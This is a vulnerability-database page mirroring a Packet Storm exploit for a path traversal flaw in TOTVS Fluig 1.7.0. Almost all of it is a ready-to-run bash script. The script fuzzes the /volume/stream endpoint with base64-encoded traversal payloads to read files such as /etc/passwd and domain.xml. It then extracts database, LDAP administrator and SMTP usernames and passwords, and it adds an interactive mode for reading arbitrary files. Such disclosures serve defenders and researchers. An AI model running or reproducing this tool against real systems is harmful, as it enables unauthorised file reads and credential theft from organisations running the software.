Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Fluig 1.7.0 Path Traversal

🗓️ 05 Mar 2021 00:00:00Reported by Lucas SouzaType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 361 Views

Fluig 1.7.0 Path Traversal vulnerability in TOTVS Fluig software allows remote attackers to read sensitive files and potentially execute arbitrary code

Code
`# Exploit Title: Fluig 1.7.0 - Path Traversal  
# Date: 26/11/2020  
# Exploit Author: Lucas Souza  
# Vendor Homepage: https://www.totvs.com/fluig/  
# Version: <== 1.7.0-210217  
# Tested on: 1.7.0-201124  
  
#!/bin/bash  
url="$1"  
npayload=$2  
> payload.txt  
curl -s https://raw.githubusercontent.com/lucxssouza/banners/main/xFluig/banner > banner  
# -- FUNCTIONS --  
  
function create-payload {  
> wordlist.txt  
count=1  
while [[ $count -le $npayload ]]; do  
# WINDOWS PAYLOAD  
echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt  
echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../users/public/desktop/desktop.ini" >> wordlist.txt  
# LINUX PAYLOAD  
echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../etc/passwd" >> wordlist.txt  
echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../opt/fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt  
count=$[$count + 1]  
done  
}  
  
function manual-mode {  
while :; do  
echo  
echo -e "\033[0;31m[!] VALID MANUAL MODE COMMANDS\033[0m"  
echo  
echo -e "\033[0;32m -[ clear - Clear Screen\033[0m"  
echo -e "\033[0;32m -[ target - Set a target\033[0m"  
echo -e "\033[0;32m -[ director/file - Ex: /etc/passwd\033[0m"  
echo -e "\033[0;32m -[ info - Target info and parse 'domain.xml' file ( require target )\033[0m"  
echo  
echo -n -e "\033[0;31mMANUAL MODE >>\033[0m "; read -r input2  
path=$(echo $input2 | sed 's/\\/\//g' | tr '[:upper:]' '[:lower:]')  
mkfile=$(echo $path | sed 's/\//-/g' | sed 's/-//' | tr '[:upper:]' '[:lower:]')  
if [[ $path == 'info' ]]; then  
clear  
cat banner  
domain-xml  
elif [[ $path == 'clear' ]]; then  
clear  
elif [[ $path == 'target' ]]; then  
XmlPayload=''  
echo  
echo -n -e "\033[0;31mINSERT TARGET >> \033[0m"; read url  
echo -n -e "\033[0;31mWORDLIST SIZE >> \033[0m"; read -i npayload  
enum  
else  
echo  
echo "$param../../../../../../../../../../../../..$path" > wordlist.txt  
wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f2 | grep 200 | cut -d'"' -f2 > payload.txt  
DirPath=$(head -1 payload.txt)  
if [[ $DirPath == '' ]]; then  
echo  
echo -e ' \033[0;33m[!] COMMAND OR DIRECTORY/FILE NOT FOUND - TYPE HELP\033[0m'  
else  
curl -s $url/volume/stream/Rmx1aWc=/$DirPath > report/$mdr/$mkfile  
echo  
echo -e '\033[0;31m'$path'\033[0m'  
echo  
cat report/$mdr/$mkfile  
echo  
pwd=$(pwd)  
echo  
echo -e '\033[0;33m'[!] FILE SAVE IN, $pwd/report/$mdr/$mkfile'\033[0m'  
fi  
fi  
done  
}  
  
function domain-xml {  
domain=$(ls report/$mdr | grep domain.xml)  
if [[ $domain == '' ]]; then  
echo  
echo -e '\033[0;33m[!] DOMAIN.XML FILE NOT FOUND\033[0m'  
else  
echo  
echo -e ' \033[0;32m | TOTVS FLUIG - [+] XML ANALISYS\033[0m'  
echo  
echo -e ' \033[0;33m[!] INFORMATION\033[0m'  
echo  
curl -s -I $url | grep Server  
echo  
echo -e '\033[0;31mTarget\033[0m'  
echo $url  
echo  
echo -e '\033[0;31mPayload plaintext\033[0m'  
echo $XmlPayload | base64 -d  
echo  
echo  
echo -e '\033[0;31mPayload base64 encoded\033[0m'  
echo $XmlPayload  
echo  
echo -e ' \033[0;31m[!] DATABASE CONNECTIONS FOUNDS\033[0m'  
echo  
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep connection-url | sed 's/<connection-url>/\o033[0;31mDB CONNECT >> \o033[0m/g' | sed 's/<\/connection-url>/ \o033[0;31m<< \o033[0m/g' | sed 's/${env.FLUIG_DATABASE_URL://g' | sed 's/}//g'  
echo  
echo -e ' \033[0;31m[!] USERS/PASSWORDS FOUNDS\033[0m'  
echo  
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep user-name | sed 's/<user-name>/ \o033[0;31mUSER >> \o033[0m/g' | sed 's/<\/user-name>/ \o033[0;31m<< \o033[0m /g' | sed 's/${env.FLUIG_DATABASE_USER://g' | sed 's/}//g'   
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep password'>' | sed 's/<password>/\o033[0;31m PASSWORD >> \o033[0m/g' | sed 's/<\/password>/ \o033[0;31m<< \o033[0m/g' | sed 's/${env.FLUIG_DATABASE_PASSWORD://g' | sed 's/}//g'  
echo  
echo -e ' \033[0;31m[!] LDAP INTEGRATIONS\033[0m'  
echo   
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep ldap:// | sed 's/<module-optionname="java.naming.provider.url"value="/\o033[0;31mDOMAIN SERVER >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'  
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep baseCtxDN | sed 's/<module-optionname="baseCtxDN"value="/\o033[0;31mDISTINGUISHED NAME >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'  
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep security.principal | sed 's/<module-optionname="java.naming.security.principal"value="/\o033[0;31mUSER ADMIN >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'  
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep security.credentials | sed 's/<module-optionname="java.naming.security.credentials"value="/\o033[0;31mPASSWORD >> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'  
echo  
echo -e ' \033[0;31m[!] SMTP SETTINGS\033[0m'  
echo  
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep remote-destination | sed 's/<remote-destinationhost="/\o033[0;31mSMTP ADDRESS >> \o033[0m/g' | sed 's/\/>/ \o033[0;31m<< \o033[0m /g' | sed 's/${env.FLUIG_SMTP_HOST://g' | sed 's/${env.FLUIG_HOST_ADDRESS://g' | sed 's/${env.FLUIG_SMTP_PORT//g'| sed 's/}//g'  
cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep smtp-server | sed 's/<smtp-serveroutbound-socket-binding-ref="mail-smtp"//g' | sed 's/\/>//g' | sed 's/password="/\o033[0;31mPASSWORD >> \o033[0m/g' | sed 's/"username="/\o033[0;31m USER >> \o033[0m/g' | sed 's/}//g' | sed 's/${env.FLUIG_SMTP_USERNAME://g' | sed 's/${env.FLUIG_SMTP_PASSWORD://g'  
echo  
manual-mode  
fi  
}  
  
function enum {  
mdr=$(echo $url | sed 's/https:\/\///' | sed 's/http:\/\///' | sed 's/\///')  
mkdir -p report/$mdr  
if [[ $url == '' ]]; then  
clear  
cat banner  
echo -e ' \033[0;31m-[ Usage Ex1: ./xfluig.sh FLUIG_ADDRESS REQUESTS_WFUZZ\033[0m'  
echo -e ' \033[0;31m-[ Ex2: ./xfluig.sh FLUIG_ADDRESS:PORT REQUESTS_WFUZZ\033[0m'  
echo -e ' \033[0;31m-[ ( ./xfluig.sh fluig.host.com:8080 1000 )\033[0m'  
manual-mode  
elif [[ $npayload == '' ]]; then  
npayload=25  
clear  
cat banner  
echo -e ' \033[0;32m | TOTVS FLUIG - [+] PATH ENUMERATION\033[0m'  
echo  
echo -e '\033[0;31m[>>] GENERATING PAYLOAD WORDLIST\033[0m'  
echo  
create-payload  
else  
clear  
cat banner  
echo -e ' \033[0;32m | TOTVS FLUIG - [+] PATH ENUMERATION\033[0m'  
echo  
echo -e '\033[0;31m[>>] GENERATING PAYLOAD WORDLIST\033[0m'  
create-payload  
fi  
echo  
echo -e '\033[0;31m[>>] RUNNING WFUZZ - WAIT\033[0m'  
echo  
wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f3 | grep 200 | cut -d'"' -f2 > payload.txt  
payload=$(head -1 payload.txt)  
if [[ $payload == '' ]]; then  
clear  
cat banner  
echo -e ' \033[0;32m | TOTVS FLUIG - PATH ENUMERATION AND XML ANALISYS \033[0m'  
echo  
echo -e '\033[0;33m[!] DIRECTORY/FILE NOT FOUND OR TARGET NOT VULNERABLE\033[0m'  
echo  
manual-mode  
else  
param=$(echo $payload | base64 -d | cut -d '.' -f1)  
clear  
cat banner  
echo -e ' \033[0;32m | TOTVS FLUIG - [+] STATUS\033[0m'  
echo  
echo -e ' \033[0;33m[!] VULNERABLE\033[0m'  
echo  
echo -e '\033[0;31m[>>] SEARCHING DOMAIN.XML FILE\033[0m'  
echo "$param../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml" > wordlist.txt  
echo "$param../../../../../../../../../../../../../opt/fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt  
wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f3 | grep 200 | cut -d'"' -f2 > payload.txt  
clear  
cat banner  
echo -e ' \033[0;32m | TOTVS FLUIG - [+] STATUS\033[0m'  
echo  
echo -e ' \033[0;33m[!] VULNERABLE\033[0m'  
echo  
curl -s -I $url | grep Server  
echo  
echo -e '\033[0;31mTarget\033[0m'  
echo $url  
echo  
echo -e '\033[0;31mPayload plaintext\033[0m'  
echo $payload | base64 -d  
echo  
echo  
echo -e '\033[0;31mPayload base64 encoded\033[0m'  
echo $payload  
echo  
fi  
XmlPayload=$(head -1 payload.txt)  
if [[ $XmlPayload == '' ]]; then  
echo  
echo -e '\033[0;33m[!] DOMAIN.XML FILE NOT FOUND\033[0m'  
manual-mode  
else  
curl -s $url/volume/stream/Rmx1aWc=/$XmlPayload | sed 's/[[:blank:]]//g' > report/$mdr/domain.xml  
echo  
echo -e '\033[0;33m[!] DOMAIN.XML FILE FOUND - TYPE "INFO" TO PARSE\033[0m'  
manual-mode  
fi  
}  
enum  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
05 Mar 2021 00:00Current
7.4High risk
Vulners AI Score7.4
fluig 1.7.0path traversaltotvssoftwareremote attackerssensitive filesarbitrary code
361